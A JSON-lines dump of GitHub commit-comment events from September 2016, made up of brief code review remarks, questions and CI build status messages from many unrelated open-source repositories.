{"id":"4527552493","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18928054,"position":null,"line":null,"path":null,"commit_id":"0e0285092b46522dd1ba3e7561cd5d6f12c43350","created_at":"2016-09-07T13:16:56Z","updated_at":"2016-09-07T13:16:56Z","body":"Zut, external third_party fix ....\r\n\r\nI have to do the ods export ;)"}},"created_at":"2016-09-07T13:16:56Z"}
{"id":"4527552631","type":"CommitCommentEvent","actor":{"login":"cneijenhuis"},"repo":{"name":"commercetools/commercetools-sunrise-ios"},"payload":{"comment":{"id":18928055,"position":null,"line":null,"path":null,"commit_id":"a3b1d239e8479519ce820551b3ec986e7fcefe1b","created_at":"2016-09-07T13:16:57Z","updated_at":"2016-09-07T13:16:57Z","body":"👍 "}},"created_at":"2016-09-07T13:16:57Z"}
{"id":"4527556428","type":"CommitCommentEvent","actor":{"login":"swane"},"repo":{"name":"swane/maverick_ctrl"},"payload":{"comment":{"id":18928064,"position":null,"line":null,"path":null,"commit_id":"173ac582c9fe651766834dbbf82836d7dade09f3","created_at":"2016-09-07T13:17:37Z","updated_at":"2016-09-07T13:17:37Z","body":"The Arduino code for the Maverick"}},"created_at":"2016-09-07T13:17:37Z"}
{"id":"4527562059","type":"CommitCommentEvent","actor":{"login":"swane"},"repo":{"name":"swane/maverick_ctrl"},"payload":{"comment":{"id":18928084,"position":null,"line":null,"path":null,"commit_id":"af231dfa1da76bc3a437918b7d7be2988916545c","created_at":"2016-09-07T13:18:37Z","updated_at":"2016-09-07T13:18:37Z","body":"The ROS / Arduino bridge"}},"created_at":"2016-09-07T13:18:37Z"}
{"id":"4527575742","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"koying/libdroidjni"},"payload":{"comment":{"id":18928119,"position":null,"line":null,"path":null,"commit_id":"916b2efab7fe0962b13f7158500d435ffaf853ad","created_at":"2016-09-07T13:21:02Z","updated_at":"2016-09-07T13:21:02Z","body":"speaking of blocking, I'm noticing a behavior on firetv where the byte arrays writes for spk 22 are not blocking but overwriting. most noticeable with dts pass using IEC. Seek around a bit and watch a/v sync get further and further off."}},"created_at":"2016-09-07T13:21:02Z"}
{"id":"4527576260","type":"CommitCommentEvent","actor":{"login":"jason-neal"},"repo":{"name":"jason-neal/Spectrum"},"payload":{"comment":{"id":18928121,"position":null,"line":null,"path":null,"commit_id":"404df06628ae9606bf6b597184528fe403cb15bc","created_at":"2016-09-07T13:21:09Z","updated_at":"2016-09-07T13:21:09Z","body":"Good point, and becasue I don't really know what I am doing, Its basically copied from other code where I was testing efficiency. Its more efficient when dealing with lists to use comprehension list then turn into an array. \r\n\r\nI had not used np.asarray before. I was using np.ndarray([list]) so that may have been the problem. \r\n\r\nI will make the change to turn xaxis and flux to arrays.  \r\n\r\nWould this still work if it was for some reason called as \r\nspec = Spectrum.Spectrum(flux)\r\nspec.xaxis = [1,2,3,4] ?\r\nwould xaxis be converted to an array in this instance?"}},"created_at":"2016-09-07T13:21:09Z"}
{"id":"4527576977","type":"CommitCommentEvent","actor":{"login":"diaaalhak"},"repo":{"name":"MoncefMhasni/MCPC-2015"},"payload":{"comment":{"id":18928123,"position":null,"line":null,"path":null,"commit_id":"1592b5541971834bd502cb9fcf9a63bae5045111","created_at":"2016-09-07T13:21:16Z","updated_at":"2016-09-07T13:21:16Z","body":"ACCEPTED Solution after tested against the secret DATA"}},"created_at":"2016-09-07T13:21:16Z"}
{"id":"4527578759","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18928130,"position":null,"line":null,"path":null,"commit_id":"21e43d31858e0d23f54da2b485098dadfdb2353a","created_at":"2016-09-07T13:21:34Z","updated_at":"2016-09-07T13:21:34Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 959](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12882&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T13:21:34Z"}
{"id":"4527580311","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"dagyus/Cuentas-Bancarias"},"payload":{"comment":{"id":18928132,"position":6,"line":6,"path":"Cuentas.java","commit_id":"086ab48365ec2dda36268e93589a082e6d79b99a","created_at":"2016-09-07T13:21:50Z","updated_at":"2016-09-07T13:21:50Z","body":"Como sé que te gusta hacer las cosas bien, por si te interesa hay un plug-in para generar javadocs. Se llama \"JAutodoc\", lo podés bajar desde Eclipse Marketplace."}},"created_at":"2016-09-07T13:21:50Z"}
{"id":"4527582876","type":"CommitCommentEvent","actor":{"login":"jimkont"},"repo":{"name":"w3c/data-shapes"},"payload":{"comment":{"id":18928140,"position":39,"line":4292,"path":"shacl/index.html","commit_id":"e198bc9689c95e89e8caeb8c3c787b9efa579856","created_at":"2016-09-07T13:22:17Z","updated_at":"2016-09-07T13:22:17Z","body":"I made an attempt but needs (a lot) more work"}},"created_at":"2016-09-07T13:22:17Z"}
{"id":"4527583100","type":"CommitCommentEvent","actor":{"login":"Hypfer"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18928141,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T13:22:19Z","updated_at":"2016-09-07T13:22:19Z","body":"Nothing changes."}},"created_at":"2016-09-07T13:22:19Z"}
{"id":"4527583699","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"dagyus/Cuentas-Bancarias"},"payload":{"comment":{"id":18928145,"position":7,"line":7,"path":"Cuentas.java","commit_id":"086ab48365ec2dda36268e93589a082e6d79b99a","created_at":"2016-09-07T13:22:25Z","updated_at":"2016-09-07T13:22:25Z","body":"Fijate que no coincide el nombre de la Clase con la del archivo .java (Debe haber quedado mal)"}},"created_at":"2016-09-07T13:22:25Z"}
{"id":"4527599335","type":"CommitCommentEvent","actor":{"login":"vsopvsop"},"repo":{"name":"spf13/hugo"},"payload":{"comment":{"id":18928177,"position":null,"line":null,"path":null,"commit_id":"0447c7598b406b706999cc06fb347eb4a4e2ff5b","created_at":"2016-09-07T13:25:04Z","updated_at":"2016-09-07T13:25:04Z","body":"Line 17 \r\n/layouts/templatefunctions\r\n\r\nnon-existant link"}},"created_at":"2016-09-07T13:25:04Z"}
{"id":"4527599687","type":"CommitCommentEvent","actor":{"login":"BatedUrGonnaDie"},"repo":{"name":"BatedUrGonnaDie/Autosplitters"},"payload":{"comment":{"id":18928179,"position":20,"line":18,"path":"Refunct/Refunct.asl","commit_id":"28d2c5d8691fa6c897f9e7aafc824a4050964646","created_at":"2016-09-07T13:25:09Z","updated_at":"2016-09-07T13:25:09Z","body":"The problem is that there is no longer one memory address that stays the same with the height.  Currently height is stored in 70+ addresses, and I don't really want to spend the time to try and track down the pointer paths for those, seeing as most of them seem to measure height just a bit differently."}},"created_at":"2016-09-07T13:25:09Z"}
{"id":"4527603164","type":"CommitCommentEvent","actor":{"login":"Glease"},"repo":{"name":"FrogCraft-Rebirth/OmniOcular"},"payload":{"comment":{"id":18928183,"position":30,"line":30,"path":"src/main/kotlin/me/exz/omniocular/OculusCordis.kt","commit_id":"7623a1e3a44a1a8f5fb8de7bc832cf95574bd083","created_at":"2016-09-07T13:25:44Z","updated_at":"2016-09-07T13:25:44Z","body":"Just curious, but... I'm wondering how long your todo list is. It must be a epic thingy.\r\n\r\n--- Original Message ---\r\n\r\nFrom: \"Urey. Xue\" <notifications@github.com>\r\nSent: September 7, 2016 9:10 PM\r\nTo: \"FrogCraft-Rebirth/OmniOcular\" <OmniOcular@noreply.github.com>\r\nCc: \"Glease\" <glease.wang@outlook.com>, \"Comment\" <comment@noreply.github.com>\r\nSubject: Re: [FrogCraft-Rebirth/OmniOcular] Caution: incoming black magic (7623a1e)\r\n\r\n\r\n\r\nAgree. Now on my todo list now.\r\n\r\n―\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/FrogCraft-Rebirth/OmniOcular/commit/7623a1e3a44a1a8f5fb8de7bc832cf95574bd083#commitcomment-18927976>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AEX9lUsh_JZTmv1GbcZ3G_livEyAVrfXks5qnre-gaJpZM4J2kK5>.\r\n"}},"created_at":"2016-09-07T13:25:44Z"}
{"id":"4527606356","type":"CommitCommentEvent","actor":{"login":"mtrabelsi"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18928189,"position":4,"line":13,"path":"application/src/main/java/org/exoplatform/chat/portlet/chat/assets/base.less","commit_id":"316726f1da0ffd62c170767ad87394e294fb6397","created_at":"2016-09-07T13:26:18Z","updated_at":"2016-09-07T13:26:18Z","body":"Done"}},"created_at":"2016-09-07T13:26:18Z"}
{"id":"4527607426","type":"CommitCommentEvent","actor":{"login":"dharmit"},"repo":{"name":"dharmit/che-dockerfiles"},"payload":{"comment":{"id":18928192,"position":null,"line":null,"path":null,"commit_id":"ad9800c2054ed707e9c514a0d367935ef959553d","created_at":"2016-09-07T13:26:29Z","updated_at":"2016-09-07T13:26:29Z","body":"@l0rd Can you check [this](https://github.com/dharmit/che-dockerfiles/commit/27c47512af0555f90a4f770e038530f962a1cacc) and let me know if it looks good?"}},"created_at":"2016-09-07T13:26:29Z"}
{"id":"4527607527","type":"CommitCommentEvent","actor":{"login":"dharmit"},"repo":{"name":"dharmit/che-dockerfiles"},"payload":{"comment":{"id":18928193,"position":null,"line":null,"path":null,"commit_id":"71c3629091bed7a4ff32a44b8fe5c05c05675308","created_at":"2016-09-07T13:26:30Z","updated_at":"2016-09-07T13:26:30Z","body":"@l0rd  Can you check [this](https://github.com/dharmit/che-dockerfiles/commit/27c47512af0555f90a4f770e038530f962a1cacc) and let me know if it looks good?"}},"created_at":"2016-09-07T13:26:30Z"}
{"id":"4527611053","type":"CommitCommentEvent","actor":{"login":"DanielAndreasen"},"repo":{"name":"jason-neal/Spectrum"},"payload":{"comment":{"id":18928199,"position":null,"line":null,"path":null,"commit_id":"404df06628ae9606bf6b597184528fe403cb15bc","created_at":"2016-09-07T13:27:05Z","updated_at":"2016-09-07T13:27:05Z","body":"Good question, I don't know. Is there a special reason why you don't use arrays? For all practical purposes the data will be loaded with `np.loadtxt`, `pd.read_csv`, `fits.getdata`, etc. and you will have it as an `np.array` at your fingertips. I have never specified a wavelength vector by hand.\r\nI guess this is for testing?"}},"created_at":"2016-09-07T13:27:05Z"}
{"id":"4527617088","type":"CommitCommentEvent","actor":{"login":"thandsome"},"repo":{"name":"sunnylost/self-learning"},"payload":{"comment":{"id":18928209,"position":null,"line":null,"path":null,"commit_id":"eedd897279462646f781d5990476306a40201d95","created_at":"2016-09-07T13:28:02Z","updated_at":"2016-09-07T13:28:02Z","body":"不错"}},"created_at":"2016-09-07T13:28:02Z"}
{"id":"4527619724","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928219,"position":13,"line":16,"path":"sdlAdventures/Game.h","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:28:30Z","updated_at":"2016-09-07T13:28:30Z","body":"Hacer el destructor Virtual!"}},"created_at":"2016-09-07T13:28:30Z"}
{"id":"4527620039","type":"CommitCommentEvent","actor":{"login":"whymog"},"repo":{"name":"whymog/trash-kings"},"payload":{"comment":{"id":18928220,"position":16,"line":35,"path":"gulpfile.js","commit_id":"d80f4d47a1137c6c8a674c1b1f5e824fd1fe6a5a","created_at":"2016-09-07T13:28:33Z","updated_at":"2016-09-07T13:28:33Z","body":"Decided to stop building each time a file saves — it seemed a little like overkill for now."}},"created_at":"2016-09-07T13:28:33Z"}
{"id":"4527620308","type":"CommitCommentEvent","actor":{"login":"PanNyaa"},"repo":{"name":"PanNyaa/panyaa.herokuapp.com"},"payload":{"comment":{"id":18928221,"position":null,"line":null,"path":null,"commit_id":"977e9a04a0ec7f6690c63112f414aab2b6c0343d","created_at":"2016-09-07T13:28:35Z","updated_at":"2016-09-07T13:28:35Z","body":"koukoku という単語はuBlockにブロックされたので苦肉のいたちごっこ開始の合図"}},"created_at":"2016-09-07T13:28:35Z"}
{"id":"4527623104","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18928229,"position":null,"line":null,"path":null,"commit_id":"feb39d673421d4e80369cff9c3112a25b09eb5df","created_at":"2016-09-07T13:29:01Z","updated_at":"2016-09-07T13:29:01Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.91%25-green.svg)</a>\n"}},"created_at":"2016-09-07T13:29:01Z"}
{"id":"4527627963","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18928241,"position":null,"line":null,"path":null,"commit_id":"feb39d673421d4e80369cff9c3112a25b09eb5df","created_at":"2016-09-07T13:29:53Z","updated_at":"2016-09-07T13:29:53Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-07T13:29:53Z"}
{"id":"4527628899","type":"CommitCommentEvent","actor":{"login":"TimOldenburger"},"repo":{"name":"davinci-ao/de-vloot"},"payload":{"comment":{"id":18928243,"position":null,"line":null,"path":null,"commit_id":"27355a33275f47c3ca43e2b0739a20192114c537","created_at":"2016-09-07T13:30:01Z","updated_at":"2016-09-07T13:30:01Z","body":"ik mis het voorbeeld voor de pagina onderzeeërs... tot die tijd kan ik eigenlijk niet verder maar ik maak er zelf wel een leuke van"}},"created_at":"2016-09-07T13:30:01Z"}
{"id":"4527629434","type":"CommitCommentEvent","actor":{"login":"wa4557"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18928244,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T13:30:08Z","updated_at":"2016-09-07T13:30:08Z","body":"how does `nm-tech-hspa.svg` look like? "}},"created_at":"2016-09-07T13:30:08Z"}
{"id":"4527630270","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18928246,"position":null,"line":null,"path":null,"commit_id":"21e43d31858e0d23f54da2b485098dadfdb2353a","created_at":"2016-09-07T13:30:18Z","updated_at":"2016-09-07T13:30:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 959](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12882&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:44"}},"created_at":"2016-09-07T13:30:18Z"}
{"id":"4527630366","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18928247,"position":null,"line":null,"path":null,"commit_id":"feb39d673421d4e80369cff9c3112a25b09eb5df","created_at":"2016-09-07T13:30:19Z","updated_at":"2016-09-07T13:30:19Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Build Failed\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T13:30:19Z"}
{"id":"4527634242","type":"CommitCommentEvent","actor":{"login":"claymanGit"},"repo":{"name":"claymanGit/hello-world"},"payload":{"comment":{"id":18928256,"position":3,"line":3,"path":"README.md","commit_id":"772625906d4e1eb656afd23eeae8c803c34bb7fc","created_at":"2016-09-07T13:30:59Z","updated_at":"2016-09-07T13:30:59Z","body":"it's my first time to do the thing in the github"}},"created_at":"2016-09-07T13:30:59Z"}
{"id":"4527635041","type":"CommitCommentEvent","actor":{"login":"claudioandre"},"repo":{"name":"claudioandre/JohnTheRipper"},"payload":{"comment":{"id":18928257,"position":17,"line":64,"path":".travis/snapcraft.yaml","commit_id":"76819a0a099a956addf1ffe27dbd869ab8f1a9da","created_at":"2016-09-07T13:31:08Z","updated_at":"2016-09-07T13:31:08Z","body":"Tag needed upstream"}},"created_at":"2016-09-07T13:31:08Z"}
{"id":"4527635475","type":"CommitCommentEvent","actor":{"login":"ulfworsoe"},"repo":{"name":"JuliaOpt/Mosek.jl"},"payload":{"comment":{"id":18928258,"position":7,"line":9,"path":"deps/build.jl","commit_id":"c471393eb3e61ee7749e0ea2a0fc909c5eaee1db","created_at":"2016-09-07T13:31:12Z","updated_at":"2016-09-07T13:31:12Z","body":"Thanks. I believe it is correct now, but I do not have a machine I can test it on at the moment."}},"created_at":"2016-09-07T13:31:12Z"}
{"id":"4527635729","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928259,"position":25,"line":16,"path":"sdlAdventures/Tetrimino.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:31:15Z","updated_at":"2016-09-07T13:31:15Z","body":"Acá está bien que tome una referencia constante de SDR_Renderer. Porque podrías tener varios renderers andando al mismo tiempo. Lo que no está bien de esta funcion es que redefinas el método de la clase padre y la llame explicitamente. Directamente deberías usar la herencia en este caso."}},"created_at":"2016-09-07T13:31:15Z"}
{"id":"4527637184","type":"CommitCommentEvent","actor":{"login":"senthil10"},"repo":{"name":"NationalGenomicsInfrastructure/NGI_dashboards"},"payload":{"comment":{"id":18928261,"position":5,"line":140,"path":"make_dashboards/templates/external/js/dashboard.js","commit_id":"850c475ff4ac7268b9d5ebbd42cde990bb551608","created_at":"2016-09-07T13:31:30Z","updated_at":"2016-09-07T13:31:30Z","body":"Would [this](http://www.w3schools.com/jsref/jsref_getfullyear.asp) be better than \"this year\" ? "}},"created_at":"2016-09-07T13:31:30Z"}
{"id":"4527639781","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18928267,"position":null,"line":null,"path":null,"commit_id":"b1c1c5d344f1fcdbadd71eab451a44001c315cb0","created_at":"2016-09-07T13:31:56Z","updated_at":"2016-09-07T13:31:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 960](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12885&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T13:31:56Z"}
{"id":"4527640239","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928268,"position":18,"line":18,"path":"sdlAdventures/Vector2D.h","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:32:01Z","updated_at":"2016-09-07T13:32:01Z","body":"en los .h no se escribe código. Pasalo al cpp"}},"created_at":"2016-09-07T13:32:01Z"}
{"id":"4527641651","type":"CommitCommentEvent","actor":{"login":"Hypfer"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18928271,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T13:32:15Z","updated_at":"2016-09-07T13:32:15Z","body":"https://i.imgur.com/9XLiBdt.png\r\n\r\nLooks correct. So where the heck is that triangle coming from?"}},"created_at":"2016-09-07T13:32:15Z"}
{"id":"4527642263","type":"CommitCommentEvent","actor":{"login":"gmouchakis"},"repo":{"name":"big-data-europe/docker-hive"},"payload":{"comment":{"id":18928272,"position":null,"line":null,"path":null,"commit_id":"f045946f91e966e3943d6994040b516d50af0ec7","created_at":"2016-09-07T13:32:19Z","updated_at":"2016-09-07T13:32:19Z","body":"When I connect to beeline I get a message\r\n\r\n`ls: cannot access /opt/hive/lib/hive-jdbc-*-standalone.jar: No such file or directory`\r\n\r\nany ideas if this will cause any problems or how to fix it?\r\n"}},"created_at":"2016-09-07T13:32:19Z"}
{"id":"4527642552","type":"CommitCommentEvent","actor":{"login":"56k-amaury"},"repo":{"name":"brusselopole/Worldopole"},"payload":{"comment":{"id":18928273,"position":null,"line":null,"path":null,"commit_id":"ece304984046d159dc6a6970ae4f3d7a03be70da","created_at":"2016-09-07T13:32:21Z","updated_at":"2016-09-07T13:32:21Z","body":"Nop, bad, really bad. \r\nRemoving the condition in MySQL mades **ALL** Pokémon load witch will kill servers. "}},"created_at":"2016-09-07T13:32:21Z"}
{"id":"4527643805","type":"CommitCommentEvent","actor":{"login":"andre-merzky"},"repo":{"name":"radical-cybertools/radical.pilot"},"payload":{"comment":{"id":18928279,"position":null,"line":null,"path":null,"commit_id":"c24a7cc0814b5c47f3b334cf38c609cc4e1c2d6f","created_at":"2016-09-07T13:32:33Z","updated_at":"2016-09-07T13:32:33Z","body":"then a `ignore_empty` flag would help I guess.  Letting the exception fall through to the application level is not enough, as that will not allow you to continue with fetching the non-empty profiles, right?"}},"created_at":"2016-09-07T13:32:33Z"}
{"id":"4527644746","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928285,"position":15,"line":15,"path":"sdlAdventures/SDLGameObject.h","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:32:42Z","updated_at":"2016-09-07T13:32:42Z","body":"virtual!"}},"created_at":"2016-09-07T13:32:42Z"}
{"id":"4527647622","type":"CommitCommentEvent","actor":{"login":"guilherme-funchal"},"repo":{"name":"guilherme-funchal/RobotFramework"},"payload":{"comment":{"id":18928298,"position":null,"line":null,"path":null,"commit_id":"50c9a648ad75f2d97c090312562efabe39fefa29","created_at":"2016-09-07T13:33:14Z","updated_at":"2016-09-07T13:33:14Z","body":"Primeiro Commit do repositório"}},"created_at":"2016-09-07T13:33:14Z"}
{"id":"4527649309","type":"CommitCommentEvent","actor":{"login":"wa4557"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18928300,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T13:33:30Z","updated_at":"2016-09-07T13:33:30Z","body":"WTF, what happens if you delete that?"}},"created_at":"2016-09-07T13:33:30Z"}
{"id":"4527650220","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"dagyus/Cuentas-Bancarias"},"payload":{"comment":{"id":18928305,"position":11,"line":11,"path":"Cuentas.java","commit_id":"086ab48365ec2dda36268e93589a082e6d79b99a","created_at":"2016-09-07T13:33:39Z","updated_at":"2016-09-07T13:33:39Z","body":"Creo que este id está de más. Podés usar nro de cuenta como ID."}},"created_at":"2016-09-07T13:33:39Z"}
{"id":"4527652841","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928308,"position":23,"line":23,"path":"sdlAdventures/SDLGameObject.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:34:06Z","updated_at":"2016-09-07T13:34:06Z","body":"Acá deberías tomar una referencia al renderer como parametro. Y tener en el mismo renderer una referencia al texture manager, en lugar de usar el singleton. O mejor aún: usando composición de clases, deberías tener una función Draw en el Renderer que llame al draw frame del texture manager."}},"created_at":"2016-09-07T13:34:06Z"}
{"id":"4527653010","type":"CommitCommentEvent","actor":{"login":"Hypfer"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18928309,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T13:34:08Z","updated_at":"2016-09-07T13:34:08Z","body":"nm-tech-hspa.svg or the triangle? I have no idea where that triangle is coming from"}},"created_at":"2016-09-07T13:34:08Z"}
{"id":"4527656128","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928315,"position":12,"line":12,"path":"sdlAdventures/Main.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:34:40Z","updated_at":"2016-09-07T13:34:40Z","body":"Los literales y constantes en variables."}},"created_at":"2016-09-07T13:34:40Z"}
{"id":"4527656179","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18928316,"position":null,"line":null,"path":null,"commit_id":"277a096add6b74ff533425f005f183dc6b2839a8","created_at":"2016-09-07T13:34:41Z","updated_at":"2016-09-07T13:34:41Z","body":"Could you calculate the mean value of ei.pi->pawn_islands() in midgames and in endgames separately? This could prove useful to calculate the average compensation to apply to QueenValueMg and QuuenValueEg."}},"created_at":"2016-09-07T13:34:41Z"}
{"id":"4527656218","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"dagyus/Cuentas-Bancarias"},"payload":{"comment":{"id":18928317,"position":9,"line":9,"path":"Cuentas.java","commit_id":"086ab48365ec2dda36268e93589a082e6d79b99a","created_at":"2016-09-07T13:34:41Z","updated_at":"2016-09-07T13:34:41Z","body":"Creo que con num de cuenta alcanza, porque en realidad una cuenta no tiene nombre. Y ya que estamos, podés renombrar \"nro_cuenta\" a \"nroCuenta\" :)"}},"created_at":"2016-09-07T13:34:41Z"}
{"id":"4527656558","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18928322,"position":null,"line":null,"path":null,"commit_id":"b3fb82ebaa87460c2e305df29048065fb45b2a7f","created_at":"2016-09-07T13:34:46Z","updated_at":"2016-09-07T13:34:46Z","body":"OK, but there are cases where the session can be non-unique (at ICPNA for example), so I wouldn't use the session name to identify a session, in general."}},"created_at":"2016-09-07T13:34:46Z"}
{"id":"4527657027","type":"CommitCommentEvent","actor":{"login":"ewels"},"repo":{"name":"NationalGenomicsInfrastructure/NGI_dashboards"},"payload":{"comment":{"id":18928323,"position":5,"line":140,"path":"make_dashboards/templates/external/js/dashboard.js","commit_id":"850c475ff4ac7268b9d5ebbd42cde990bb551608","created_at":"2016-09-07T13:34:50Z","updated_at":"2016-09-07T13:34:50Z","body":"Yeah that'd be fine.\r\n\r\nJavaScript ≠ Java"}},"created_at":"2016-09-07T13:34:50Z"}
{"id":"4527657752","type":"CommitCommentEvent","actor":{"login":"bomu-bomu"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18928324,"position":400,"line":400,"path":"react/react_include.js","commit_id":"03115adb40e2d1bf4286d01009804e4c31f0be76","created_at":"2016-09-07T13:34:58Z","updated_at":"2016-09-07T13:34:58Z","body":"อ่อ  ขี้เกียจประกาศตัวแปร  include แบบ Script ธรรมดา มันดันต้องใส่นะนี่   55+  เดี๋ยวจัดให้ ๆ"}},"created_at":"2016-09-07T13:34:58Z"}
{"id":"4527658658","type":"CommitCommentEvent","actor":{"login":"bomu-bomu"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18928326,"position":397,"line":397,"path":"react/react_include.js","commit_id":"03115adb40e2d1bf4286d01009804e4c31f0be76","created_at":"2016-09-07T13:35:11Z","updated_at":"2016-09-07T13:35:11Z","body":"โอวววว "}},"created_at":"2016-09-07T13:35:11Z"}
